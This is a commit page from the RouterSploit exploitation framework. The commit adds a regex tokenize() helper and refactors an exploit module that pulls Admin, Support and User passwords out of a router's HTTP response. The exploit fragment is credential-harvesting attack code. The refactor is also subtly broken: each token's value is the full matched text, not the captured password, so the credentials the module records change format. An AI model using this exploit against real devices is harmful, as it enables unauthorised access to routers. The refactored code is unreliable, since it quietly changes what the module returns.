Commit 107678b3 by fwkz

Adding tokenize()

parent 121eed79
...@@ -7,6 +7,7 @@ from routersploit.utils import ( ...@@ -7,6 +7,7 @@ from routersploit.utils import (
sanitize_url, sanitize_url,
LockedIterator, LockedIterator,
http_request, http_request,
tokenize,
) )
from routersploit import exploits from routersploit import exploits
......
import re
from routersploit import ( from routersploit import (
exploits, exploits,
sanitize_url, sanitize_url,
...@@ -7,6 +5,7 @@ from routersploit import ( ...@@ -7,6 +5,7 @@ from routersploit import (
print_error, print_error,
print_success, print_success,
print_table, print_table,
tokenize,
http_request, http_request,
) )
...@@ -44,17 +43,14 @@ class Exploit(exploits.Exploit): ...@@ -44,17 +43,14 @@ class Exploit(exploits.Exploit):
except AttributeError: except AttributeError:
return return
admin = re.findall("pwdAdmin = '(.+?)'", response) tokens = [
if admin: ("Admin", r"pwdAdmin = '(.+?)'"),
creds.append(('Admin', admin[0])) ("Support", r"pwdSupport = '(.+?)'"),
("User", r"pwdUser = '(.+?)'")
support = re.findall("pwdSupport = '(.+?)'", response) ]
if support:
creds.append(('Support', support[0]))
user = re.findall("pwdUser = '(.+?)'", response) for token in tokenize(tokens, response):
if user: creds.append((token.typ, token.value))
creds.append(('User', user[0]))
if creds: if creds:
print_success("Credentials found!") print_success("Credentials found!")
......
...@@ -2,6 +2,8 @@ from __future__ import print_function ...@@ -2,6 +2,8 @@ from __future__ import print_function
import threading import threading
from functools import wraps from functools import wraps
import sys import sys
import re
import collections
import requests import requests
...@@ -259,3 +261,27 @@ def http_request(method, url, **kwargs): ...@@ -259,3 +261,27 @@ def http_request(method, url, **kwargs):
except requests.RequestException as error: except requests.RequestException as error:
print_error(error) print_error(error)
return return
def tokenize(token_specification, text):
    """Scan *text* against a list of (name, regex) token specifications.

    :param token_specification: list of ``(typ, pattern)`` pairs; ``typ`` must
        be a valid Python identifier (it becomes a regex group name).
        The list is NOT modified (a local copy is extended with the
        catch-all NEWLINE/SKIP rules).
    :param text: the string to scan.
    :return: generator of ``Token(typ, value, line, column, mo)`` namedtuples,
        one per match of a user-supplied pattern. ``value`` is the full text
        matched by that pattern and ``mo`` is the underlying match object
        (so callers can pull capture groups out of it). Newlines and
        unmatched characters are consumed silently but tracked for
        line/column bookkeeping.
    """
    Token = collections.namedtuple('Token', ['typ', 'value', 'line', 'column', 'mo'])
    # Work on a copy: extending the caller's list in place would leak the
    # NEWLINE/SKIP entries back to the caller and, on a second call with the
    # same list, raise re.error for duplicate group names.
    spec = list(token_specification)
    spec.extend((
        ('NEWLINE', r'\n'),  # Line endings
        ('SKIP', r'.'),      # Any other character
    ))
    tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in spec)
    line_num = 1
    line_start = 0
    for mo in re.finditer(tok_regex, text):
        kind = mo.lastgroup
        value = mo.group(kind)
        if kind == 'NEWLINE':
            # Start of the next line; columns are measured from here.
            line_start = mo.end()
            line_num += 1
        elif kind == 'SKIP':
            pass  # character matched by no user pattern — ignore
        else:
            column = mo.start() - line_start
            yield Token(kind, value, line_num, column, mo)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment